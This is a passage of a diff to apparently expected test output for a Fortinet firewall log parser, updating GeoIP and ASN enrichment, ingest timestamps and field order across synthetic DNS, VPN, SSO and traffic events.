eventtime=1587230224712900694 tz=\"-0500\" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=2352 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=93 catdesc=\"Remote Access\"", "code": "1501054802", "timezone": "-0500", @@ -901,6 +1009,18 @@ "level": "information" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 53, "ip": "67.43.156.13" }, @@ -968,7 +1088,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357794Z", + "ingested": "2021-12-14T14:43:01.495910800Z", "original": "\u003c190\u003edate=2020-04-23 time=12:17:12 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1500054000\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-query\" level=\"information\" vd=\"root\" eventtime=1587230232658642672 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=235 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\"", "code": "1500054000", "timezone": "-0500", @@ -988,6 +1108,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.13" }, @@ -1056,7 +1188,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357800Z", + "ingested": "2021-12-14T14:43:01.495911186Z", "original": "\u003c189\u003edate=2020-04-23 time=13:15:18 devname=\"testswitch2\" devid=\"someotherid\" logid=\"1700062001\" type=\"utm\" subtype=\"ssl\" eventtype=\"ssl-anomalies\" level=\"notice\" vd=\"root\" eventtime=1587230118838592454 tz=\"-0400\" policyid=12 sessionid=42346234 service=\"HTTPS\" user=\"elasticuser2\" group=\"elasticgroup2\" profile=\"somecerts\" srcip=192.168.2.1 srcport=59726 dstip=67.43.156.13 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 action=\"passthrough\" msg=\"Server certificate passed\" reason=\"untrusted-cert\"", "code": "1700062001", "timezone": "-0400", @@ -1118,7 +1250,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357806500Z", + "ingested": "2021-12-14T14:43:01.495911978Z", "original": "\u003c189\u003edate=2020-04-23 time=12:32:48 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043014\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587231168439640874 tz=\"-0500\" logdesc=\"FSSO logon authentication status\" srcip=10.10.10.10 user=\"elasticouser\" server=\"elasticserver\" action=\"FSSO-logon\" msg=\"FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10\"", "code": "0102043014", "timezone": "-0500", @@ -1139,6 +1271,18 @@ "level": "error" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 500, "ip": "67.43.156.13" }, @@ -1146,6 +1290,18 @@ "description": "IPsec phase 1 error" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 500, "ip": "67.43.156.13" }, @@ -1183,7 +1339,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357812600Z", + "ingested": "2021-12-14T14:43:01.495912361Z", "original": "\u003c187\u003edate=2020-04-23 time=12:32:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037124\" type=\"event\" subtype=\"vpn\" level=\"error\" vd=\"root\" eventtime=1587231168339114138 tz=\"-0500\" logdesc=\"IPsec phase 1 error\" msg=\"IPsec phase 1 error\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf=\"wan2\" cookies=\"345hkjhdrs87/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"N/A\" status=\"negotiate_error\" reason=\"peer SA proposal not match local policy\" peer_notif=\"NOT-APPLICABLE\"", "code": "0101037124", "timezone": "-0500", @@ -1203,6 +1359,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 500, "ip": "67.43.156.13" }, @@ -1210,6 +1378,18 @@ "description": "Progress IPsec phase 1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 500, "ip": "67.43.156.13" }, @@ -1254,7 +1434,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357818800Z", + "ingested": "2021-12-14T14:43:01.495912758Z", "original": "\u003c189\u003edate=2020-04-23 time=12:32:31 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231151628960857 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf=\"wan1\" cookies=\"df868dsg876d/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"elasticvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", "code": "0101037127", "timezone": "-0500", @@ -1305,9 +1485,8 @@ "rule": { "description": "System performance statistics" }, - "message": "Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0", "event": { - "ingested": "2021-12-09T13:37:22.357824800Z", + "ingested": "2021-12-14T14:43:01.495913162Z", "original": "\u003c189\u003edate=2020-04-23 time=14:32:09 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100040704\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587231129938795255 tz=\"-0300\" logdesc=\"System performance statistics\" action=\"perf-stats\" cpu=0 mem=10 totalsession=23 disk=0 bandwidth=\"23/4\" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg=\"Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0\"", "code": "0100040704", "timezone": "-0300", @@ -1320,6 +1499,7 @@ "host" ] }, + "message": "Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0", "tags": [ "preserve_original_event" ] @@ -1371,7 +1551,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357830900Z", + "ingested": "2021-12-14T14:43:01.495913543Z", "original": "\u003c189\u003edate=2020-04-23 time=12:32:09 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043039\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587231130109462858 tz=\"-0500\" logdesc=\"Authentication logon\" srcip=10.10.10.10 user=\"elastiiiuser\" authserver=\"FSSO_elastiauth\" action=\"auth-logon\" status=\"logon\" msg=\"User elastiiiuser added to auth logon\"", "code": "0102043039", "timezone": "-0500", @@ -1392,6 +1572,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 500, "ip": "67.43.156.13" }, @@ -1399,6 +1591,18 @@ "description": "Progress IPsec phase 1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 500, "ip": "67.43.156.14" }, @@ -1444,7 +1648,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357837200Z", + "ingested": "2021-12-14T14:43:01.495914067Z", "original": "\u003c189\u003edate=2020-04-23 time=12:32:00 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231120608961118 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.14 remport=500 locport=500 outintf=\"wan1\" cookies=\"345khj34566/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"testvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", "code": "0101037127", "timezone": "-0500", @@ -1485,15 +1689,15 @@ "rule": { "description": "FortiSandbox AV database updated" }, - "message": "FortiSandbox AV database updated", "event": { "start": "2020-04-18T14:24:15.301-03:00", - "ingested": "2021-12-09T13:37:22.357843300Z", + "ingested": "2021-12-14T14:43:01.495914477Z", "original": "\u003c189\u003edate=2020-04-23 time=14:24:13 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100041006\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230655301863513 tz=\"-0300\" logdesc=\"FortiSandbox AV database updated\" version=\"1.522479\" msg=\"FortiSandbox AV database updated\"", "code": "0100041006", "timezone": "-0300", "kind": "event" }, + "message": "FortiSandbox AV database updated", "tags": [ "preserve_original_event" ] @@ -1548,7 +1752,7 @@ }, "event": { "start": "2020-04-18T12:23:47.558-05:00", - "ingested": "2021-12-09T13:37:22.357849400Z", + "ingested": "2021-12-14T14:43:01.495914851Z", "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0107045057\" type=\"event\" subtype=\"endpoint\" level=\"information\" vd=\"root\" eventtime=1587230627558979735 tz=\"-0500\" logdesc=\"FortiClient connection added\" action=\"add\" status=\"success\" license_limit=\"unlimited\" used_for_type=3 connection_type=\"sslvpn\" count=2 user=\"elastico\" ip=172.16.0.2 name=\"somerouter\" fctuid=\"645234fdd01F885824F764\" msg=\"Add a FortiClient Connection.\"", "code": "0107045057", "timezone": "-0500", @@ -1560,6 +1764,18 @@ "level": "information" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "rule": { @@ -1596,7 +1812,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357885900Z", + "ingested": "2021-12-14T14:43:01.495915232Z", "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039943\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627334405765 tz=\"-0500\" logdesc=\"SSL VPN new connection\" action=\"ssl-new-con\" tunneltype=\"ssl\" tunnelid=2 remip=67.43.156.13 user=\"N/A\" group=\"N/A\" dst_host=\"N/A\" reason=\"N/A\" msg=\"SSL new connection\"", "code": "0101039943", "timezone": "-0500", @@ -1615,6 +1831,18 @@ "level": "information" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "rule": { @@ -1664,7 +1892,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357893800Z", + "ingested": "2021-12-14T14:43:01.495915643Z", "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039947\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627698970007 tz=\"-0500\" logdesc=\"SSL VPN tunnel up\" action=\"tunnel-up\" tunneltype=\"ssl-tunnel\" tunnelid=2345 remip=67.43.156.13 tunnelip=10.10.10.10 user=\"someuser\" group=\"somegroup\" dst_host=\"N/A\" reason=\"tunnel established\" msg=\"SSL tunnel established\"", "code": "0101039947", "timezone": "-0500", @@ -1724,7 +1952,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357900200Z", + "ingested": "2021-12-14T14:43:01.495916030Z", "original": "\u003c189\u003edate=2020-04-23 time=14:16:42 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043015\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587230204674924332 tz=\"-0300\" logdesc=\"FSSO log off authentication status\" srcip=192.168.1.1 user=\"elasticadmin\" server=\"FSSO_somefssoserver\" action=\"FSSO-logoff\" msg=\"FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1\"", "code": "0102043015", "timezone": "-0300", @@ -1767,15 +1995,15 @@ "rule": { "description": "FortiCloud server connected" }, - "message": "FortiCloud 67.43.156.13 server is connected", "event": { "start": "2020-04-18T12:16:03.121-05:00", - "ingested": "2021-12-09T13:37:22.357905Z", + "ingested": "2021-12-14T14:43:01.495916417Z", "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022915\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163121116383 tz=\"-0500\" logdesc=\"FortiCloud server connected\" server=\"67.43.156.13\" action=\"connect\" msg=\"FortiCloud 67.43.156.13 server is connected\"", "code": "0100022915", "timezone": "-0500", "kind": "event" }, + "message": "FortiCloud 67.43.156.13 server is connected", "tags": [ "preserve_original_event" ] @@ -1808,15 +2036,15 @@ "rule": { "description": "FortiCloud server disconnected" }, - "message": "FortiCloud 4.4.4.4 server is disconnected", "event": { "start": "2020-04-18T12:16:03.375-05:00", - "ingested": "2021-12-09T13:37:22.357927100Z", + "ingested": "2021-12-14T14:43:01.495916914Z", "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022913\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163375149856 tz=\"-0500\" logdesc=\"FortiCloud server disconnected\" server=\"4.4.4.4\" action=\"disconnect\" reason=\"connection reset\" msg=\"FortiCloud 4.4.4.4 server is disconnected\"", "code": "0100022913", "timezone": "-0500", "kind": "event" }, + "message": "FortiCloud 4.4.4.4 server is disconnected", "tags": [ "preserve_original_event" ] @@ -1826,6 +2054,18 @@ "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 53, "ip": "67.43.156.13" }, @@ -1891,7 +2131,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357931400Z", + "ingested": "2021-12-14T14:43:01.495917303Z", "original": "\u003c188\u003edate=2020-04-23 time=12:14:09 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230049761513222 tz=\"-0500\" srcip=192.168.1.6 srcport=53438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=435234 proto=17 action=\"dns\" policyid=26 policytype=\"policy\" poluuid=\"2345de-b143-52134d8-6654f-4654sdfg16f431\" policyname=\"elasticnewruleset\" service=\"DNS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=54144 crlevel=\"low\"", "code": "0000000011", "timezone": "-0500", @@ -1914,6 +2154,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 6000, "bytes": 65446, "packets": 1045601, @@ -1931,10 +2183,22 @@ "port": 60964, "ip": "67.43.156.14" }, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 6000, "bytes": 438650, - "packets": 723417, - "ip": "192.168.10.10" + "ip": "192.168.10.10", + "packets": 723417 }, "tags": [ "preserve_original_event" @@ -1992,7 +2256,7 @@ }, "event": { "duration": 5462000000000, - "ingested": "2021-12-09T13:37:22.357936400Z", + "ingested": "2021-12-14T14:43:01.495917690Z", "original": "\u003c189\u003edate=2020-04-23 time=12:11:51 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000020\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587229911390385486 tz=\"-0500\" srcip=192.168.10.10 srcport=6000 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=6000 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=4352 proto=17 action=\"accept\" policyid=3426 policytype=\"policy\" poluuid=\"1765de8-5a13-765da73fdsfa1c\" policyname=\"newruleelastic\" service=\"portname\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=67.43.156.14 transport=60964 appcat=\"unknown\" applist=\"policylist\" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728", "code": "0000000020", "timezone": "-0500", @@ -2017,18 +2281,12 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "bytes": 20, "packets": 0, @@ -2042,18 +2300,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "bytes": 3014, "packets": 4, @@ -2110,7 +2362,7 @@ }, "event": { "duration": 42000000000, - "ingested": "2021-12-09T13:37:22.357958800Z", + "ingested": "2021-12-14T14:43:01.495918076Z", "original": "\u003c189\u003edate=2020-04-23 time=12:11:48 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229908751434997 tz=\"-0500\" srcip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 identifier=0 srcintf=\"port1\" srcintfrole=\"lan\" dstip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=6542345 proto=58 action=\"accept\" policyid=0 policytype=\"someotherpolicy\" service=\"icmp6/1/0\" trandisp=\"noop\" app=\"icmp6/25/0\" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat=\"unscanned\"", "code": "0001000014", "timezone": "-0500", @@ -2134,6 +2386,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "bytes": 10, "packets": 40, "ip": "67.43.156.13" @@ -2144,6 +2408,18 @@ "id": "0" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "bytes": 0, "packets": 0, "ip": "67.43.156.13" @@ -2201,7 +2477,7 @@ }, "event": { "duration": 20000000000, - "ingested": "2021-12-09T13:37:22.357964600Z", + "ingested": "2021-12-14T14:43:01.495918471Z", "original": "\u003c189\u003edate=2020-04-23 time=13:10:57 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229857509058693 tz=\"-0400\" srcip=67.43.156.13 identifier=61 srcintf=\"wan1\" srcintfrole=\"wan\" dstip=67.43.156.13 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=123 proto=1 action=\"accept\" policyid=0 policytype=\"rulepolicy\" service=\"PING\" dstcountry=\"Norway\" srccountry=\"Netherlands\" trandisp=\"noop\" app=\"PING\" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat=\"unscanned\"", "code": "0001000014", "timezone": "-0400", @@ -2297,7 +2573,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357970300Z", + "ingested": "2021-12-14T14:43:01.495918862Z", "original": "\u003c188\u003edate=2020-04-23 time=12:14:39 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230079841464445 tz=\"-0500\" srcip=192.168.1.1 srcport=62493 srcintf=\"port1\" srcintfrole=\"lan\" dstip=192.168.100.100 dstport=1235 dstintf=\"newinterface\" dstintfrole=\"undefined\" sessionid=54234 proto=17 action=\"ip-conn\" policyid=49 policytype=\"policy\" poluuid=\"654cc-b6542-53467u8-e45234-1566casd35f7836\" policyname=\"oldpolicyname\" user=\"elasticsuper\" authserver=\"FSSO_newfsso\" service=\"udp/12302\" dstcountry=\"Reserved\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=63332144 crlevel=\"low\"", "code": "0000000011", "timezone": "-0500", @@ -2320,6 +2596,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 442, "bytes": 77654, "packets": 70, @@ -2337,16 +2625,28 @@ "port": 603, "ip": "67.43.156.14" }, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 56603, + "bytes": 923, + "ip": "192.168.50.50", "user": { "name": "elasticuser", "group": { "name": "testgroup" } }, - "bytes": 923, - "packets": 113, - "ip": "192.168.50.50" + "packets": 113 }, "tags": [ "preserve_original_event" @@ -2421,7 +2721,7 @@ }, "event": { "duration": 126000000000, - "ingested": "2021-12-09T13:37:22.357976Z", + "ingested": "2021-12-14T14:43:01.495919245Z", "original": "\u003c189\u003edate=2020-04-23 time=12:14:28 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587230069291463928 tz=\"-0500\" srcip=192.168.50.50 srcport=56603 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=442 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=2345 proto=6 action=\"close\" policyid=2365 policytype=\"policy\" poluuid=\"654644c-b064-fdgdf3425-f003-1234ghdf682e05f\" policyname=\"someoldpolicyname\" user=\"elasticuser\" group=\"testgroup\" authserver=\"FSSO_something\" service=\"HTTPS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=67.43.156.14 transport=603 appid=43540 app=\"Skype.Portals\" appcat=\"Collaboration\" apprisk=\"elevated\" applist=\"someapplist\" appact=\"detected\" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality=\"Seq_num(3), alive, selected\" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction=\"block\" countweb=1 countapp=1 crscore=5 craction=6144 crlevel=\"low\"", "code": "0000000013", "timezone": "-0500", @@ -2445,6 +2745,18 @@ "level": "information" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.14" }, @@ -2524,7 +2836,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357981800Z", + "ingested": "2021-12-14T14:43:01.495919630Z", "original": "\u003c190\u003edate=2019-05-15 time=18:03:36 logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"app-ctrl-all\" level=\"information\" vd=\"root\" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=67.43.156.14 srcport=50798 dstport=443 srcintf=\"port10\" srcintfrole=\"lan\" dstintf=\"port9\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" direction=\"outgoing\" policyid=1 sessionid=4414 applist=\"block-social.media\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" action=\"pass\" hostname=\"www.dailymotion.com\" incidentserialno=1962906680 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"*.dailymotion.com\" scertissuer=\"DigiCert SHA2 High Assurance Server CA\"", "code": "1059028704", "kind": "event", @@ -2544,6 +2856,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 500, "ip": "67.43.156.13" }, @@ -2596,7 +2920,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357987500Z", + "ingested": "2021-12-14T14:43:01.495920015Z", "original": "\u003c190\u003edate=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type=\"event\" subtype=vpn level=notice vd=root logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=negotiate remip=67.43.156.13 locip=10.10.10.10 remport=500 locport=500 outintf=\"port1\" cookies=\"125cbf9ee8349965/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"P1_Test\" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK", "code": "0101037127", "kind": "event", @@ -2636,15 +2960,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-12-09T13:37:22.357993200Z", + "ingested": "2021-12-14T14:43:01.495920429Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880370858 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"FCTEMS0000011111_AV-Running\" msg=\"Updated tag FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag FCTEMS0000011111_AV-Running.", "tags": [ "preserve_original_event" ] @@ -2676,15 +3000,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-12-09T13:37:22.357998900Z", + "ingested": "2021-12-14T14:43:01.495920828Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880455433 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"MAC_FCTEMS0000011111_AV-Running\" msg=\"Updated tag MAC_FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "tags": [ "preserve_original_event" ] @@ -2716,15 +3040,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-12-09T13:37:22.358004900Z", + "ingested": "2021-12-14T14:43:01.495921339Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880744919 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "tags": [ "preserve_original_event" ] @@ -2756,15 +3080,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag 